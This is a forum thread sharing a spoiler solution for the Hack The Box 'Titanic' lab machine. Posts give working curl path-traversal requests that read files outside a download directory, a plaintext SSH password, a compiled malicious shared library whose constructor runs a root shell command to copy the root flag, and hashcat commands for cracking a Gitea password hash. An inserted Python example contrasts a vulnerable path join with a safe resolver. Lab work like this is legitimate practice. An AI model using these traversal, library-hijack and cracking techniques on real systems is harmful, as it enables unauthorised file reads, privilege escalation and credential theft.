Titanic Hack the Box Season 7 (Linux Easy)
by RedBlock - Saturday February 15, 2025 at 02:59 PM
#31
how did you know the location of gitea.db?
Reply
#32
(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

Check the gitea config repository of the developer and google
Reply
#33
I am still confused as to how we did the root thing
Reply
#34
(Feb 16, 2025, 01:24 AM)samuelballsiu1 Wrote:
(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

Check the gitea config repository of the developer and google

Sorry, silly mistakes. Try to bruteforce dirsearch where the dev subdomain is certainly open.

Next question: how to find any clue for priv esc? I'm running linpeas but found nothing interesting.
Reply
#35
(Feb 15, 2025, 07:17 PM)LostGem Wrote: user flag
curl --path-as-is -s -k "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/user.txt"

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: titanic.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://titanic.htb/' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Priority: u=0, i' \
    $'http://titanic.htb/download?ticket=/home/developer/user.txt'


Copied from Burp. Directly pointing ticket=/home/developer/user.txt works.
Reply
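
Added example, not part of any post in this thread: post #35 shows two request shapes reaching the same file, a ../ chain and a bare absolute path. The Python below assumes a hypothetical download handler that joins a ticket directory with the ticket parameter (the thread does not show the server code; naive_resolve, safe_resolve and the file names are made up here) and shows why a plain join lets both shapes out of the directory, next to a resolver that rejects them.

```python
import os
import tempfile

def naive_resolve(base_dir: str, ticket: str) -> str:
    """Weak pattern (assumed, not the box's code): join and trust the result."""
    # os.path.join discards base_dir when ticket is absolute, and ".."
    # segments survive the join, so both request shapes leave base_dir.
    return os.path.normpath(os.path.join(base_dir, ticket))

def safe_resolve(base_dir: str, ticket: str) -> str:
    """Return the real path of ticket inside base_dir, or raise ValueError."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks before the containment check.
    target = os.path.realpath(os.path.join(base, ticket))
    if target == base or os.path.commonpath([base, target]) != base:
        raise ValueError("ticket resolves outside the ticket directory")
    if not os.path.isfile(target):
        raise ValueError("no such ticket")
    return target

def demo() -> dict:
    """Run both resolvers over constructed inputs in a temp directory."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        root = os.path.realpath(root)
        base = os.path.join(root, "tickets")
        os.mkdir(base)
        secret = os.path.join(root, "user.txt")  # constructed stand-in file
        for path in (secret, os.path.join(base, "abc.json")):
            with open(path, "w") as fh:
                fh.write("x")
        for ticket in ("abc.json", "../user.txt", secret):
            resolved = naive_resolve(base, ticket)
            naive_escapes = not resolved.startswith(base + os.sep)
            try:
                safe_resolve(base, ticket)
                allowed = True
            except ValueError:
                allowed = False
            label = "absolute" if ticket == secret else ticket
            results[label] = (naive_escapes, allowed)
    return results

if __name__ == "__main__":
    for ticket, (escapes, allowed) in demo().items():
        print(f"{ticket!r}: naive escapes={escapes}, safe allows={allowed}")
```
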
#36
(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

read docker-compose.yml
Reply
#37
(Feb 15, 2025, 07:58 PM)LostGem Wrote: userflag

curl --path-as-is -s -k "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/user.txt"
ssh creds for developer
developer : 25282528

Root!

cd /opt/app/static/assets/images
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
    system("cat /root/root.txt > /tmp/root.txt");
    exit(0);
}
EOF

cp entertainment.jpg root.jpg

cat /tmp/root.txt

How did you find this vulnerability?
Reply
#38
Quote:How did you find this vulnerability?

After finding that script, check magick version and google for vulns, read CVE description and you are ready to go
Reply
#39
So the script in /opt/scripts and the custom PATH for the developer user were only rabbit holes?
Reply
#40
For me, hashcat doesn't like the format the hashes are in after the gitea2hashcat.py script. What is the correct format for the hashes?

For anyone that's having similar issues:

cat developer_hash.txt
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

hashcat -m 10900 --force developer_hash.txt /usr/share/wordlists/rockyou.txt
Reply

